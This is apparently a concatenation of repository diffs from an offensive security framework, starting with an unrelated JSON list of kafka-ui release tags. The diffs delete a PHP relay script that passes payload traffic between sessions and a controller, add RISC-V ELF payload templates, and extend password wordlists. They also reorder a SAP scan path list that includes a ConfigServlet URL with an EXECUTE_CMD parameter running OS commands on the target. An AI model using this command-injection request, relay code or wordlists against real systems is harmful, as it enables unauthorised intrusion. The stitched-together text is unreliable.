"sha": "b0c367cac7211117e88a55517396764036ac0552"
}
},
{
"name": "v0.6.1",
"commit": {
"sha": "ef0dacb0c36a1a180ef8fda670c82854658aab00"
}
},
{
"name": "v0.6.0",
"commit": {
"sha": "e72f6d6d5dd078df2d270cc48a4087588443f89a"
}
},
{
"name": "v0.5.0",
"commit": {
"sha": "027d9b4653e2f3ea13d4de6a0b2bd568106ffb40"
}
},
{
"name": "v0.4.0",
"commit": {
"sha": "521ba0cb2f63110eb2ed13a7054a4d70238a862a"
}
},
{
"name": "v0.3.3",
"commit": {
"sha": "38c4cf7dd9275294348bab903be9dc12eafe37dd"
}
},
{
"name": "v0.3.2",
"commit": {
"sha": "9d9d31a6694ab1fc12da20ea18fa5a778ce5a631"
}
},
{
"name": "v0.3.1",
"commit": {
"sha": "e75c251013845f1921ea75c24b44fd7164ee398d"
}
},
{
"name": "v0.3.0",
"commit": {
"sha": "9606d7ee5ab3b8056b4a69610ae79b7b473d779d"
}
},
{
"name": "v0.2.1",
"commit": {
"sha": "da29a200cd8ec46da709e0523787479ac6fb274b"
}
},
{
"name": "v0.2.0",
"commit": {
"sha": "2e345f6f6caeb3495f6454bfaa5a10bf50639411"
}
},
{
"name": "v0.1.0",
"commit": {
"sha": "1869a7f0a85ceaa707ea25866da98a3ac5a0667e"
}
},
{
"name": "v0.0.10",
"commit": {
"sha": "f08970c1d8910091a392d26b51db33b5c99a0f81"
}
},
{
"name": "v0.0.9",
"commit": {
"sha": "f98abfb79dc2c437f1b6cb5f534da560c85c5406"
}
},
{
"name": "v0.0.8",
"commit": {
"sha": "222cf2c65189c97877491c7bcc6fc14982ce65d7"
}
},
{
"name": "v0.0.7",
"commit": {
"sha": "2a743a5bf4b27a6cc9cb857bd178c2e724d98821"
}
},
{
"name": "v0.0.6",
"commit": {
"sha": "f6253b6bfaa249236ac1b4f0505f4b7af8f89116"
}
},
{
"name": "v0.0.5",
"commit": {
"sha": "abae56b3d0d2383d0351280213236cd988fd6d28"
}
},
{
"name": "v0.0.4",
"commit": {
"sha": "4190d76f2fefb65cb898f6c648e932b2c1a5fba3"
}
},
{
"name": "v0.0.3",
"commit": {
"sha": "8057dc123f23f6da9752d712edeb5e7e490b648c"
}
},
{
"name": "v0.0.2",
"commit": {
"sha": "f5bb336a75351379dad289b73a85f6ebf8ff5498"
}
},
{
"name": "v0.0.1",
"commit": {
"sha": "ed08f278f95dca46e58e24a13923939d268eedd3"
}
},
{
"name": "charts/kafka-ui-0.7.1",
"commit": {
"sha": "c998e17e8322a867c02ef4cdf577aa33c2d3a81e"
}
},
{
"name": "charts/kafka-ui-0.7.0",
"commit": {
"sha": "78cc4dd981a89b26006fea0984f1305bc663281f"
}
},
{
"name": "charts/kafka-ui-0.6.2",
"commit": {
"sha": "838fb604d569dae18a1a7a85ef28ed2c125df986"
}
},
{
"name": "charts/kafka-ui-0.6.1",
"commit": {
"sha": "4a1e987a1d2a958119ab5c936d4b1d82125e14d9"
}
},
{
"name": "charts/kafka-ui-0.6.0",
"commit": {
"sha": "f2a2574ddc8bbe20776071569935922c3593d5e7"
}
},
{
"name": "charts/kafka-ui-0.5.4",
"commit": {
"sha": "334ba3df99dfc84385faace167f6410c8ce0be91"
}
},
{
"name": "charts/kafka-ui-0.5.3",
"commit": {
"sha": "cbb166026d8c6360836def9bf9c208313023961c"
}
}
]
+2
View File
@@ -83,6 +83,8 @@
<% description = "The module is expected to get a shell every time it runs." %>
<% elsif reliability == "unreliable-session" %>
<% description = "The module isn't expected to get a shell reliably (such as only once)." %>
<% elsif reliability == "event-dependent" %>
<% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
<% end %>
* **<%= reliability %>:** <%= description %>
-68
View File
@@ -1,68 +0,0 @@
<?php
$magic = 'TzGq';
$tempdir = sys_get_temp_dir() . "/hop" . $magic;
if(!is_dir($tempdir)){
mkdir($tempdir); //make sure it's there
}
//get url
$url = $_SERVER["QUERY_STRING"];
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
//Looks for a file with a name or contents prefix, if found, send it and deletes it
function findSendDelete($tempdir, $prefix, $one=true){
if($dh = opendir($tempdir)){
while(($file = readdir($dh)) !== false){
if(strpos($file, $prefix) !== 0){
continue;
}
readfile($tempdir."/".$file);
unlink($tempdir."/".$file);
if($one){
break;
}
}
}
}
//handle control
if($url === "/control"){
if($_SERVER['REQUEST_METHOD'] === 'POST'){
//handle data for payload - save in a "down" file or the "init" file
$postdata = file_get_contents("php://input");
if(array_key_exists('HTTP_X_INIT', $_SERVER)){
$f = fopen($tempdir."/init", "w"); //only one init file
}else{
$prefix = "down_" . sha1($_SERVER['HTTP_X_URLFRAG']);
$f = fopen(tempnam($tempdir,$prefix), "w");
}
fwrite($f, $postdata);
fclose($f);
}else{
findSendDelete($tempdir, "up_", false);
}
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
//get data
$postdata = file_get_contents("php://input");
//See if we should send anything down
if($postdata === "RECV\x00" || $postdata === "RECV"){
findSendDelete($tempdir, "down_" . sha1($url));
$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
}else{
$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
}
//find free and write new file
$f = fopen($fname, "w");
fwrite($f, $magic);
//Little-endian pack length and data
$urlen = strlen($url);
fwrite($f, pack('V', $urlen));
fwrite($f, $url);
$postdatalen = strlen($postdata);
fwrite($f, pack('V', $postdatalen));
fwrite($f, $postdata);
fclose($f);
//Initial query will be a GET and have a 12345 in it
}else if(strpos($url, "12345") !== FALSE){
readfile($tempdir."/init");
}
@@ -0,0 +1,98 @@
; build with:
; nasm elf_dll_riscv32le_template.s -f bin -o template_riscv32le_linux_dll.bin
BITS 32
org 0
ehdr:
db 0x7f, "ELF", 1, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 0xF3 ; e_machine = EM_RISCV
dd 1 ; e_version = EV_CURRENT
dd _start ; e_entry = _start
dd phdr - $$ ; e_phoff
dd shdr - $$ ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr:
dd 1 ; p_type = PT_LOAD
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd 0xDEADBEEF ; p_filesz
dd 0xDEADBEEF ; p_memsz
dd 7 ; p_flags = rwx
dd 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dd dynsection ; p_offset
dd dynsection ; p_vaddr
dd dynsection ; p_vaddr
dd dynsz ; p_filesz
dd dynsz ; p_memsz
dd 0x1000 ; p_align
shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dd 0 ; sh_flags
dd dynsection ; sh_addr
dd dynsection ; sh_offset
dd dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dd 8 ; sh_addralign
dd 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dd 0 ; sh_flags
dd strtab ; sh_addr
dd strtab ; sh_offset
dd strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dd 0 ; sh_addralign
dd 0 ; sh_entsize
dynsection:
; DT_INIT
dd 0x0c
dd _start
; DT_STRTAB
dd 0x05
dd strtab
; DT_SYMTAB
dd 0x06
dd strtab
; DT_STRSZ
dd 0x0a
dd 0
; DT_SYMENT
dd 0x0b
dd 0
; DT_NULL
dd 0x00
dd 0
dynsz equ $ - dynsection
strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
@@ -0,0 +1,99 @@
; build with:
; nasm elf_dll_riscv64le_template.s -f bin -o template_riscv64le_linux_dll.bin
BITS 64
org 0
ehdr: ; Elf64_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 3 ; e_type = ET_DYN
dw 0xF3 ; e_machine = RISCV
dd 1 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq shdr - $$ ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dq dynsection ; p_vaddr
dq dynsz ; p_filesz
dq dynsz ; p_memsz
dq 0x1000 ; p_align
shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dq 0 ; sh_flags
dq dynsection ; sh_addr
dq dynsection ; sh_offset
dq dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 8 ; sh_addralign
dq 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dq 0 ; sh_flags
dq strtab ; sh_addr
dq strtab ; sh_offset
dq strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 0 ; sh_addralign
dq 0 ; sh_entsize
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
; DT_STRSZ
dq 0x0a
dq 0
; DT_SYMENT
dq 0x0b
dq 0
; DT_NULL
dq 0x00
dq 0
dynsz equ $ - dynsection
strtab:
db 0
db 0
strtabsz equ $ - strtab
align 16
global _start
_start:
@@ -9,7 +9,7 @@ ehdr: ; Elf32_Ehdr
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0xB7 ; e_machine = AARCH64
dd 0 ; e_version
dd 1 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
+42
View File
@@ -0,0 +1,42 @@
; build with:
; nasm elf_riscv32le_template.s -f bin -o template_riscv32le_linux.bin
BITS 32
org 0x00010000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0xF3 ; e_machine = RISCV
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd 0xDEADBEEF ; p_filesz
dd 0xDEADBEEF ; p_memsz
dd 7 ; p_flags = rwx
dd 0x1000 ; p_align
phdrsize equ $ - phdr
global _start
_start:
+42
View File
@@ -0,0 +1,42 @@
; build with:
; nasm elf_riscv64le_template.s -f bin -o template_riscv64le_linux.bin
BITS 64
org 0x00400000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0xF3 ; e_machine = RISCV
dd 1 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
global _start
_start:
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+5
View File
@@ -1454,6 +1454,7 @@ bewan
beyonce
bhaby
bhebhe
bianbu
bianca
bier
bigboy
@@ -3061,6 +3062,7 @@ lucas
lucenttech1
lucenttech2
lucero
luckfox
lucky
lucky1
lucky7
@@ -3248,6 +3250,7 @@ mikel
mikey
milagros
milkshake
milkv
miller
millie
mine
@@ -3477,6 +3480,7 @@ operator
oqksad
oracle
orange
orangepi
orlando
orpheus
oscar
@@ -4192,6 +4196,7 @@ stacey
stanley
star
starfish
starfive
stargate
stark123
starl
+8
View File
@@ -7290,6 +7290,7 @@ bi
bi-level
bia
bialystok
bianbu
bianca
bianco
bianka
@@ -44356,6 +44357,7 @@ limy
lin
lina
linage
linaro
linc
linchpin
lincoln
@@ -45397,6 +45399,7 @@ lucita
lucite
lucius
luck
luckfox
luckhoff
luckier
luckily
@@ -49040,6 +49043,7 @@ milkshark
milksop
milkweed
milkwoodpark
milkv
milky
mill
millaa
@@ -55429,6 +55433,7 @@ orang-utan
orang-utans
orange
orangeade
orangepi
orangery
oranges
orangey
@@ -63171,6 +63176,7 @@ radium
radius
radix
radon
radxa
rae
raeann
raedene
@@ -74326,6 +74332,7 @@ stardust
stare
starer
starfish
starfive
starfruit
stargate
stargaze
@@ -77837,6 +77844,7 @@ temporizer
temporizing
temporizingly
temporizings
temppwd
tempt
temptation
tempted
+1224 -140
View File
@@ -1,3 +1,7 @@
/@download@
/ADS-EJB
/ADS-License
/AE/index.jsp
/AdapterFramework/version/version.jsp
/AdminTools/
/Adobe
@@ -5,64 +9,26 @@
/AdobeDocumentServices/Config?wsdl
/AdobeDocumentServices/Grmg
/AdobeDocumentServicesSec/Config
/ADS-EJB
/ADS-License
/AE/index.jsp
/AnalyticalReporting/
/AnalyticalReporting/AnalyticalReporting_merge_web.xml
/AnalyticalReporting/download/win32/websetup.properties
/apidocs/
/apidocs/allclasses-frame.html
/apidocs/com/sap/engine/connector/connection/IConnection.html
/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
/ApplicationAdminProvider
/bcb/
/bcb/bcbadmHome.jsp
/bcb/bcbadmNavigation.jsp
/bcb/bcbadmSettings.jsp
/bcb/bcbadmStart.jsp
/bcb/bcbadmSystemInfo.jsp
/bcbtest/start.jsp
/BI_UDC
/BizcCommLayerAuthoring/Config1
/BizcCommLayerAuthoring/Config1?wsdl
/BizcCommLayerAuthoring/Config?wsdl
/bwtest
/caf
/CAFDataService/Config
/CAFDataService/Config?wsdl
/ccsui
/CmcApp/logon.faces
/CMSRTS/Config1
/CMSRTS/Config1?wsdl
/CMSRTS/Config?wsdl
/com~tc~lm~webadmin~httpprovider~web
/CmcApp/logon.faces
/CrystalReports/viewrpt.cwr
/ctc
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
/DataArchivingService
/dispatcher
/@download@
/dswsbobje
/dswsbobje/services/BICatalog?wsdl
/dswsbobje/services/listServices
/examples/
/examples_frame.html
/examples.html
/exchangeProfile/
/GRMGHeartBeat
/GRMGWSTest/service
/GRMGWSTest/service?wsdl
/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
/htmlb/
/htmlb/docs/api/index.html
/htmlb/index.html
/htmlb/jsp/index.jsp
/htmlb/moresamples.html
/htmlb/samples.html
/IGSCustomizingXML
/IciActionItemService/IciActionItemConf
/IciActionItemService/IciActionItemConf?wsdl
/IciChatLineService/IciChatLineConf
@@ -86,11 +52,67 @@
/IciSystemService/IciSystemConf?wsdl
/IciUserService/IciUserConf
/IciUserService/IciUserConf?wsdl
/IGSCustomizingXML
/index.html
/InfoViewApp/
/InfoViewApp/help/en/user/html/
/InfoViewApp/listing/main.do?appKind=InfoView&service=%2FInfoViewApp%2Fcommon%2FappService.do
/KW
/Lighthammer
/Modeler
/OpenSQLMonitors/
/PerformacetraceTraceApplication
/RE/index.jsp
/SAPIKS
/SAPIKS2
/SAPIKS2/contentShow.sap
/SAPIKS2/jsp/adminShow.jsp
/SAPIrExtHelp
/SLDStart/plain
/SLDStart/secure
/SQLtrace/index.html
/TOdbo
/TSapq
/TXmla
/TestJDBC_Web
/VC
/WSConnector/Config1
/WSConnector/Config1?wsdl
/WSConnector/Config?wsdl
/apidocs/
/apidocs/allclasses-frame.html
/apidocs/com/sap/engine/connector/connection/IConnection.html
/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
/bcb/
/bcb/bcbadmHome.jsp
/bcb/bcbadmNavigation.jsp
/bcb/bcbadmSettings.jsp
/bcb/bcbadmStart.jsp
/bcb/bcbadmSystemInfo.jsp
/bcbtest/start.jsp
/bwtest
/caf
/ccsui
/com~tc~lm~webadmin~httpprovider~web
/ctc
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
/dispatcher
/dswsbobje
/dswsbobje/services/BICatalog?wsdl
/dswsbobje/services/listServices
/examples.html
/examples/
/examples_frame.html
/exchangeProfile/
/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
/htmlb/
/htmlb/docs/api/index.html
/htmlb/index.html
/htmlb/jsp/index.jsp
/htmlb/moresamples.html
/htmlb/samples.html
/index.html
/inspection.wsil
/ipcpricing/ui/
/irj
@@ -111,32 +133,26 @@
/irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
/irj/servlet/prt/portal/prtroot/pcd!(*)
/irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
/KW
/Lighthammer
/logon
/logon/index.jsp
/logon/logonServlet
/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
/logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
/logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
/main.html
/meSync/HttpGRMGTest.html
/mmr/
/mmr/mmr/MMRUI.html
/Modeler
/modeller/
/modeller/index.html
/monitoring
/monitoring/SystemInfo
/nwa
/OpenSQLMonitors/
/PerformacetraceTraceApplication
/performanceProvierRoot
/pmi
/portal
/portalapps
/RE/index.jsp
/rep/build_info.html
/rep/build_info.jsp
/rep/start/index.jsp
@@ -147,9 +163,24 @@
/samlssodemo_dest
/samlssodemo_source
/sap/
/sap/BSSP_SP_MAPS
/sap/IStest
/sap/admin
/sap/admin/public/index.html
/sap/ap
/sap/bc/FormToRfc
/sap/bc/FormToRfc/soap
/sap/bc/IDoc_XML
/sap/bc/MIDSD
/sap/bc/MJC
/sap/bc/MJC/
/sap/bc/MJC/mi_host
/sap/bc/MJC/mi_mds
/sap/bc/MJC/mi_service
/sap/bc/MJC/mi_services
/sap/bc/MY_NEW_SERV99
/sap/bc/Mi_host_http
/sap/bc/Mime
/sap/bc/abap/demo
/sap/bc/abap/demo_apc
/sap/bc/abap/demo_apc_pcp
@@ -184,34 +215,34 @@
/sap/bc/bsp/sap/certmap
/sap/bc/bsp/sap/certreq
/sap/bc/bsp/sap/crm_bsp_frame
/sap/bc/bsp/sap/crm_ic_ise/editor
/sap/bc/bsp/sap/crm_thtmlb_util
/sap/bc/bsp/sap/crm_ui_frame
/sap/bc/bsp/sap/crm_ui_start
/sap/bc/bsp/sap/crmcmp_bpident/
/sap/bc/bsp/sap/crmcmp_brfcase
/sap/bc/bsp/sap/crmcmp_hdr
/sap/bc/bsp/sap/crmcmp_hdr_std
/sap/bc/bsp/sap/crmcmp_ic_frame
/sap/bc/bsp/sap/crm_ic_ise/editor
/sap/bc/bsp/sap/crm_thtmlb_util
/sap/bc/bsp/sap/crm_ui_frame
/sap/bc/bsp/sap/crm_ui_start
/sap/bc/bsp/sap/esh_sapgui_exe
/sap/bc/bsp/sap/esh_sap_link
/sap/bc/bsp/sap/esh_sapgui_exe
/sap/bc/bsp/sap/graph_bsp_test
/sap/bc/bsp/sap/graph_bsp_test/Mimes
/sap/bc/bsp/sap/gsbirp
/sap/bc/bsp/sap/hrrcf_wd_dovru
/sap/bc/bsp/sap/htmlb_samples
/sap/bc/bsp/sap/ic_frw_notify
/sap/bc/bsp/sap/iccmp_bp_cnfirm
/sap/bc/bsp/sap/iccmp_hdr_cntnr
/sap/bc/bsp/sap/iccmp_hdr_cntnt
/sap/bc/bsp/sap/iccmp_header
/sap/bc/bsp/sap/iccmp_ssc_ll/
/sap/bc/bsp/sap/ic_frw_notify
/sap/bc/bsp/sap/it00
/sap/bc/bsp/sap/it00/default.htm
/sap/bc/bsp/sap/it00/http_client.htm
/sap/bc/bsp/sap/it00/http_client_xml.htm
/sap/bc/bsp/sap/public/bc
/sap/bc/bsp/sap/public/FAA
/sap/bc/bsp/sap/public/bc
/sap/bc/bsp/sap/public/graphics
/sap/bc/bsp/sap/public/sem
/sap/bc/bsp/sap/sam_demo
@@ -221,17 +252,17 @@
/sap/bc/bsp/sap/sbspext_xhtmlb
/sap/bc/bsp/sap/spi_admin
/sap/bc/bsp/sap/spi_monitor
/sap/bc/bsp/sapsrm
/sap/bc/bsp/sapsrm/bsp_dhtml_apple
/sap/bc/bsp/sapsrm/bsp_java_applet
/sap/bc/bsp/sapsrm/call_sig_ctrl
/sap/bc/bsp/sapsrm/ctlg_wrapper
/sap/bc/bsp/sap/sxms_alertrules
/sap/bc/bsp/sap/system
/sap/bc/bsp/sap/thtmlb_scripts
/sap/bc/bsp/sap/thtmlb_styles
/sap/bc/bsp/sap/uicmp_ltx
/sap/bc/bsp/sap/xmb_bsp_log
/sap/bc/bsp/sapsrm
/sap/bc/bsp/sapsrm/bsp_dhtml_apple
/sap/bc/bsp/sapsrm/bsp_java_applet
/sap/bc/bsp/sapsrm/call_sig_ctrl
/sap/bc/bsp/sapsrm/ctlg_wrapper
/sap/bc/contentserver
/sap/bc/docu
/sap/bc/echo
@@ -249,23 +280,10 @@
/sap/bc/erecruiting/verification
/sap/bc/error
/sap/bc/error
/sap/bc/FormToRfc
/sap/bc/FormToRfc/soap
/sap/bc/graphics/net
/sap/bc/gui/sap/its/CERTREQ
/sap/bc/gui/sap/its/designs
/sap/bc/gui/sap/its/webgui
/sap/bc/IDoc_XML
/sap/bc/MIDSD
/sap/bc/Mi_host_http
/sap/bc/Mime
/sap/bc/MJC
/sap/bc/MJC/
/sap/bc/MJC/mi_host
/sap/bc/MJC/mi_mds
/sap/bc/MJC/mi_service
/sap/bc/MJC/mi_services
/sap/bc/MY_NEW_SERV99
/sap/bc/ping
/sap/bc/report
/sap/bc/soap/ici
@@ -276,19 +294,23 @@
/sap/bc/wdvd
/sap/bc/wdvd/
/sap/bc/webdynpro
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
/sap/bc/webdynpro/sap/WDR_TEST_TABLE
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
/sap/bc/webdynpro/sap/apb_launchpad
/sap/bc/webdynpro/sap/apb_launchpad_nwbc
/sap/bc/webdynpro/sap/apb_lpd_light_start
/sap/bc/webdynpro/sap/apb_lpd_start_url
/sap/bc/webdynpro/sap/application_exit
/sap/bc/webdynpro/sap/appl_log_trc_viewer
/sap/bc/webdynpro/sap/appl_soap_management
/sap/bc/webdynpro/sap/application_exit
/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
/sap/bc/webdynpro/sap/cnp_light_test
/sap/bc/webdynpro/sap/configure_application
/sap/bc/webdynpro/sap/configure_component
/sap/bc/webdynpro/sap/esh_admin_ui_component
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
/sap/bc/webdynpro/sap/esh_admin_ui_component
/sap/bc/webdynpro/sap/esh_eng_modelling
/sap/bc/webdynpro/sap/esh_search_results.ui
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
@@ -314,25 +336,20 @@
/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
/sap/bc/webdynpro/sap/wd_analyze_config_appl
/sap/bc/webdynpro/sap/wd_analyze_config_comp
/sap/bc/webdynpro/sap/wd_analyze_config_user
/sap/bc/webdynpro/sap/wdhc_application
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
/sap/bc/webdynpro/sap/wdr_test_popups_rt
/sap/bc/webdynpro/sap/WDR_TEST_TABLE
/sap/bc/webdynpro/sap/wdr_test_ui_elements
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
/sap/bc/webrfc
/sap/bc/workflow/shortcut
/sap/bc/xrfc
/sap/bc/xrfc_test
/sap/BSSP_SP_MAPS
/sap/crm
/sap/es/atk
/sap/es/cockpit
@@ -347,16 +364,39 @@
/sap/gw
/sap/gw/bep
/sap/gw/jsonrpc
/SAPIKS
/SAPIKS2
/SAPIKS2/contentShow.sap
/SAPIKS2/jsp/adminShow.jsp
/SAPIrExtHelp
/sap/IStest
/sapmc/sapmc.html
/sap/monitoring/
/sap/public
/sap/public/BusinessSuite
/sap/public/BusinessSuite/BCV
/sap/public/BusinessSuite/BSSP
/sap/public/BusinessSuite/CBESH_ICONS
/sap/public/BusinessSuite/CloCo
/sap/public/BusinessSuite/TM
/sap/public/BusinessSuite/TM/FlashIslands
/sap/public/BusinessSuite/TM/Icons
/sap/public/BusinessSuite/TM/Icons_rtl
/sap/public/E2EALERT
/sap/public/ES
/sap/public/HRPDV
/sap/public/HRPDV/Icons
/sap/public/HRRenewal
/sap/public/HRRenewal/PB
/sap/public/LSOFE
/sap/public/LSOFE/IconLarge
/sap/public/LSOFE/IconLarge/CORBU
/sap/public/LSOFE/IconLarge/TRADESHOW
/sap/public/LSOFE/Pictogram
/sap/public/LSOFE/Pictogram/CORBU
/sap/public/LSOFE/Pictogram/TRADESHOW
/sap/public/PPM
/sap/public/PPM/PFM
/sap/public/PPM/PFM/BCV
/sap/public/PPM/PFM/UI
/sap/public/PPM/PRO
/sap/public/bc
/sap/public/bc/AR_NEWS_REDRCT
/sap/public/bc/NWDEMO_MODEL
/sap/public/bc/NW_ESH_TST_AUTO
/sap/public/bc/abap
/sap/public/bc/abap/docu
/sap/public/bc/abap/mime_demo
@@ -364,7 +404,6 @@
/sap/public/bc/apc_test
/sap/public/bc/apc_test/apc_tcp_test_sf
/sap/public/bc/apc_test/apc_tcp_test_sl
/sap/public/bc/AR_NEWS_REDRCT
/sap/public/bc/bpo
/sap/public/bc/bsp
/sap/public/bc/clms
@@ -388,8 +427,6 @@
/sap/public/bc/its/mobile/test
/sap/public/bc/its/scripts
/sap/public/bc/jsm
/sap/public/bc/NWDEMO_MODEL
/sap/public/bc/NW_ESH_TST_AUTO
/sap/public/bc/pictograms
/sap/public/bc/qgm
/sap/public/bc/sec
@@ -410,13 +447,13 @@
/sap/public/bc/ur
/sap/public/bc/wdtracetool
/sap/public/bc/webdynpro
/sap/public/bc/webdynpro/adobechallenge
/sap/public/bc/webdynpro/adobeChallenge
/sap/public/bc/webdynpro/mimes
/sap/public/bc/webdynpro/Polling
/sap/public/bc/webdynpro/ViewDesigner
/sap/public/bc/webdynpro/adobeChallenge
/sap/public/bc/webdynpro/adobechallenge
/sap/public/bc/webdynpro/mimes
/sap/public/bc/webdynpro/ssr
/sap/public/bc/webdynpro/viewdesigner
/sap/public/bc/webdynpro/ViewDesigner
/sap/public/bc/webicons
/sap/public/bc/workflow
/sap/public/bc/workflow/shortcut
@@ -424,31 +461,16 @@
/sap/public/bsp/sap
/sap/public/bsp/sap/htmlb
/sap/public/bsp/sap/public
/sap/public/bsp/sap/public/FAA
/sap/public/bsp/sap/public/ISE
/sap/public/bsp/sap/public/SEM
/sap/public/bsp/sap/public/bc
/sap/public/bsp/sap/public/faa
/sap/public/bsp/sap/public/FAA
/sap/public/bsp/sap/public/graphics
/sap/public/bsp/sap/public/graphics/jnet_handler
/sap/public/bsp/sap/public/graphics/mimes
/sap/public/bsp/sap/public/ISE
/sap/public/bsp/sap/public/SEM
